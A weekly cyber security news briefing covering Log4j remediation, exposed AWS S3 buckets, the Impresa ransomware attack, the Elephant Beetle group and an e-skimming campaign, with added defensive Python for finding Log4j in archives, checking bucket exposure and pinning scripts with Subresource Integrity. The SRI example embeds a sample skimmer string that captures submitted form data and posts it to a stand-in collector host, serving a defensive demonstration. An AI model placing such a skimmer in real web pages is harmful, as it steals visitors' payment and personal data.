The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends, and indicators, curated by our intelligence specialists.
- The Apache Log4j saga continues. Stay up-to-date with four key developments on Log4j.
- There’s a hole in your bucket. SEGA Europe and D.W. Morgan exposed data via unsecured AWS S3 buckets.
- New year, more ransomware. Impresa suffers ransomware attack featuring interesting extortion tactics.
- How to eat an elephant. Threat group Elephant Beetle steals millions over long periods of time.
- E-skimming attack. Over 100 property websites infected with digital skimmers.
1. The Apache Log4j saga continues
Since being publicly disclosed on 10 December 2021, vulnerabilities in the logging software Apache Log4j have had a significant impact worldwide. Here are four key developments to keep you updated:
- Microsoft has warned that malicious actors, including nation state actors, are continuing to attempt to exploit the Log4j vulnerabilities.
- The US Cybersecurity and Infrastructure Security Agency (CISA) released a scanning tool, Log4j-scanner, that aims to identify web services potentially susceptible to Log4j’s remote code execution vulnerabilities.
- A collection of global cyber security agencies has released a joint advisory that includes guidance on identifying assets affected by Log4j vulnerabilities, updating those affected assets, and initiating search procedures to detect possible Log4j exploitation.
- The US Federal Trade Commission has warned that it intends to “use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future”.
SO WHAT? Log4j vulnerabilities continue to pose a serious risk to organisations, but tools are available to help mitigate that risk. Organisations must ensure that they know where, and how, Log4j is employed in their estate, including copies bundled inside third-party and in-house applications rather than installed as a standalone library, and that the relevant measures to remediate Log4j vulnerabilities are implemented swiftly.
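Knowing where Log4j is employed usually means finding the library inside application archives rather than on a package list. The script below is an added example for this briefing, not CISA's log4j-scanner or S-RM's own tooling: it walks a directory tree, opens every JAR, WAR, EAR or ZIP (and archives nested inside them, as fat JARs and WARs carry their dependencies), reads the log4j-core pom.properties that Maven-built jars ship with, and reports the version and whether the JndiLookup class that the remote code execution bug depends on is still present. The threshold of 2.17.1 is an assumption (the Log4j 2 release current for Java 8 when this briefing was written); adjust it to whatever Apache currently recommends. The sample jars built in the main block are constructed fixtures, not real artefacts.

```python
"""Find Log4j 2.x inside archives under a directory tree and report the version.

Added example for this briefing; not CISA's log4j-scanner. Reads the
log4j-core pom.properties that Maven-built jars contain, looks inside
nested archives (WAR/EAR/fat JAR), and flags whether JndiLookup.class,
the class the JNDI lookup exploit needs, is still present.
"""
import io
import os
import re
import zipfile
from typing import Iterator

POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumption: 2.17.1 was the Log4j 2 release to be on (Java 8+) when this was
# written; change this to the version Apache currently recommends.
FIXED = (2, 17, 1)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) so pre-releases sort as old."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return (0, 0, 0)
    return tuple(int(n or 0) for n in m.groups())


def inspect_archive(data: bytes, name: str, depth: int = 0) -> Iterator[dict]:
    """Yield one finding per log4j-core found in this archive or archives nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM_PATH in names:
        props = zf.read(POM_PATH).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        yield {
            "archive": name,
            "version": version,
            "needs_update": parse_version(version) < FIXED,
            "jndi_lookup_present": JNDI_CLASS in names,
        }
    if depth < 2:  # WARs and fat JARs carry log4j-core as a nested jar
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                yield from inspect_archive(zf.read(inner), f"{name}!{inner}", depth + 1)


def scan_tree(root: str) -> list:
    """Scan every archive under root; returns the list of findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def make_sample_jar(path: str, version: str, with_jndi: bool) -> None:
    """Constructed fixture: a minimal jar holding only the files the scanner reads."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PATH, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1", True)
        make_sample_jar(os.path.join(tmp, "log4j-core-2.17.1.jar"), "2.17.1", False)
        for finding in scan_tree(tmp):
            print(finding)
```

Run it against application directories, container image layers and file shares, not just the host's library path; a finding with needs_update false but jndi_lookup_present true is worth a second look, since some vendors shipped patched builds under unchanged version strings. Log4j 1.x carries no pom.properties at that path and is not found by this script; it is end-of-life and affected by different issues, so track it separately.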
2. SEGA Europe and D.W. Morgan expose data through misconfigured AWS S3 Buckets
- SEGA Europe, a video game and entertainment company, reportedly left an Amazon Web Services (AWS) S3 bucket publicly exposed. The unsecured bucket contained sensitive user information and multiple sets of AWS keys that could have been used to access many of the company's cloud services.
- Separately, the supply chain management and logistics giant D.W. Morgan also reportedly exposed sensitive data relating to its clients and various shipments after a publicly exposed and unsecured AWS S3 bucket was discovered online.
There is no indication whether any of the data left exposed by SEGA Europe or D.W. Morgan was accessed by malicious actors.
SO WHAT? Public and private cloud resources should be separated, with appropriate security configurations in place, and credentials such as AWS keys should never be stored in a bucket; any keys found in an exposed bucket should be treated as compromised and rotated. Conduct regular penetration tests and configuration reviews to ensure your resources are adequately secured.
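A bucket becomes reachable from the internet through one of three settings: its ACL, its bucket policy, or the absence of an account or bucket level Public Access Block. The checker below is an added example for this briefing, not code from S-RM or from either company named above. It takes the dict shapes that boto3's get_bucket_acl, get_bucket_policy and get_public_access_block return, so the logic would run unchanged on live output, but everything it is fed here is constructed sample data; the bucket name and policy are hypothetical.

```python
"""Decide whether an S3 bucket is exposed to the public.

Added example for this briefing. Evaluates the bucket ACL, the bucket
policy and the Public Access Block configuration using the dict shapes
boto3 returns; all data below is constructed, not from a real account.
"""
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    # AuthenticatedUsers means any AWS account in the world, which AWS also treats as public
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def public_acl_grants(acl: dict) -> list:
    """Permissions the ACL grants to AllUsers or AuthenticatedUsers."""
    return [
        g["Permission"]
        for g in acl.get("Grants", [])
        if g.get("Grantee", {}).get("Type") == "Group"
        and g["Grantee"].get("URI") in PUBLIC_GROUPS
    ]


def _principal_is_public(principal) -> bool:
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False


def public_policy_statements(policy_json: str) -> list:
    """Allow statements whose Principal is everyone. A Condition may narrow the grant,
    so such statements are marked conditional for manual review rather than ignored."""
    doc = json.loads(policy_json)
    stmts = doc.get("Statement", [])
    if isinstance(stmts, dict):
        stmts = [stmts]
    return [
        {"Sid": s.get("Sid"), "Action": s.get("Action"), "conditional": "Condition" in s}
        for s in stmts
        if s.get("Effect") == "Allow" and _principal_is_public(s.get("Principal"))
    ]


def assess_bucket(acl: dict, policy_json, pab: dict) -> dict:
    """Combine the three sources. IgnorePublicAcls makes public ACL grants inert and
    RestrictPublicBuckets stops a public policy from granting access outside the account."""
    cfg = pab.get("PublicAccessBlockConfiguration", {})
    acl_perms = [] if cfg.get("IgnorePublicAcls") else public_acl_grants(acl)
    stmts = public_policy_statements(policy_json) if policy_json else []
    stmts = [] if cfg.get("RestrictPublicBuckets") else stmts
    return {
        "public_access_block_complete": all(cfg.get(k) is True for k in PAB_KEYS),
        "public_acl_grants": acl_perms,
        "public_policy_statements": stmts,
        "is_public": bool(acl_perms or [s for s in stmts if not s["conditional"]]),
    }


# Constructed samples mirroring boto3 output; the bucket and policy are hypothetical.
EXPOSED_ACL = {"Grants": [{"Grantee": {"Type": "Group",
               "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"}]}
EXPOSED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}]})
NO_PAB = {"PublicAccessBlockConfiguration": {k: False for k in PAB_KEYS}}
FULL_PAB = {"PublicAccessBlockConfiguration": {k: True for k in PAB_KEYS}}

if __name__ == "__main__":
    print(assess_bucket(EXPOSED_ACL, EXPOSED_POLICY, NO_PAB))    # is_public: True
    print(assess_bucket(EXPOSED_ACL, EXPOSED_POLICY, FULL_PAB))  # is_public: False
```

The intended end state for a private bucket is public_access_block_complete true, which is why the check reports it separately from is_public: a bucket that is private today only because nobody has added a public statement yet is one policy edit away from the SEGA Europe and D.W. Morgan situation. Content that genuinely must be public belongs in a dedicated bucket or behind a CDN, not mixed with customer data and credentials.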
3. Impresa suffers ransomware attack featuring interesting pressure tactics
Impresa Group, a Portuguese media company, suffered a ransomware attack by a new ransomware group named Lapsus$. The group targeted Impresa’s critical server infrastructure, which significantly disrupted the company’s operations. At the time of writing, Impresa’s online streaming services remained down, while its radio and TV broadcasting services were unaffected.
Lapsus$ also employed several interesting extortion tactics. They defaced Impresa’s websites with a ransom note, took control of and tweeted from the company’s Twitter account, and sent text messages to Impresa’s customers notifying them of the incident.
SO WHAT? Incident response plans should consider the need to respond to a range of pressure tactics employed by threat actors, and ransomware groups in particular.
4. Elephant Beetle threat group hiding in victim networks to divert transactions
A sophisticated threat group named Elephant Beetle has reportedly compromised numerous organisations and, using over 80 unique tools and scripts, siphoned millions of US dollars from their victims. The group is reportedly patient, spending long periods of time in their victims’ networks before committing their fraud. They typically use many fraudulent transactions to steal small amounts of money over long periods of time.
Elephant Beetle appears to gain access to its victims’ networks by exploiting vulnerabilities in legacy Java applications running on Linux systems.
SO WHAT? Organisations should ensure that software is patched regularly and legacy systems are not accessible from the internet. Include the indicators of compromise for Elephant Beetle in your security programmes.
5. Over 100 property websites compromised in e-skimming attack
In a new supply chain attack, cybercriminals injected malicious code into a cloud video platform to install digital skimmers on over 100 property websites. When websites embedded the video player, the e-skimmer was embedded as well. Compromised sites have remediated the issue since the campaign was discovered but it is believed that sensitive data such as names, email addresses, phone numbers, and credit card information may have been stolen by the attackers.
SO WHAT? Administrators should conduct regular code reviews of their websites to monitor for any potential malicious code, bearing in mind that reviewing their own code will not catch a script loaded from a third party: scripts served by vendors should be pinned to a known version or strictly allowlisted, so that a change on the vendor’s side cannot silently run on your pages.
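One concrete way to pin a vendor script is Subresource Integrity (SRI): the page commits to a hash of the script, and the browser refuses to run a copy whose hash differs. The code below is an added example for this briefing, not part of the original and not from the video platform or any affected site; it generates the integrity value for a script tag and shows the same check failing once a skimmer is appended. The player script, the skimmer, and the CDN URL are all constructed stand-ins.

```python
"""Pin a third-party script with Subresource Integrity and detect tampering.

Added example for this briefing. sri_hash() produces the integrity
attribute value; check_sri() is the comparison a browser performs on
the fetched script, and what a monitoring job can run against the
vendor's hosted copy. All script content here is constructed.
"""
import base64
import hashlib

# Constructed stand-in for a vendor video player script.
CLEAN_PLAYER = b"(function(){window.Player={play:function(id){/* video player */}};})();"
# Constructed stand-in for an injected skimmer: hooks form submission and beacons the fields.
SKIMMER = (b"document.addEventListener('submit',e=>fetch('https://collector.invalid/c',"
           b"{method:'POST',body:new FormData(e.target)}));")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """'sha384-<base64 digest>', the format the integrity attribute uses."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI allows only sha256, sha384 and sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def check_sri(content: bytes, integrity: str) -> bool:
    """Accept the content if any token in the attribute matches it.

    Simplified relative to the spec, which considers only the tokens using the
    strongest listed algorithm; tokens with unknown algorithms are skipped.
    """
    for token in integrity.split():
        algo, _, expected = token.partition("-")
        try:
            if sri_hash(content, algo) == f"{algo}-{expected}":
                return True
        except ValueError:
            continue
    return False


def script_tag(src: str, content: bytes) -> str:
    """The tag to commit into the page for a reviewed copy of a vendor script."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_hash(CLEAN_PLAYER)
    print(script_tag("https://cdn.example/player.js", CLEAN_PLAYER))  # hypothetical URL
    print("clean copy accepted:", check_sri(CLEAN_PLAYER, pinned))             # True
    print("skimmed copy accepted:", check_sri(CLEAN_PLAYER + SKIMMER, pinned))  # False
```

The caveat a practitioner will hit immediately: SRI only works when the vendor's script is stable at a given URL. A cloud platform that updates its player in place will break the page as soon as it ships a legitimate change, which is exactly the moment you want a human to look at the new code. Where pinning is not workable, self-host a reviewed copy, or at least set a Content Security Policy whose connect-src and form-action directives do not allow posting to arbitrary hosts, so that a skimmer that does load has nowhere to send what it collects.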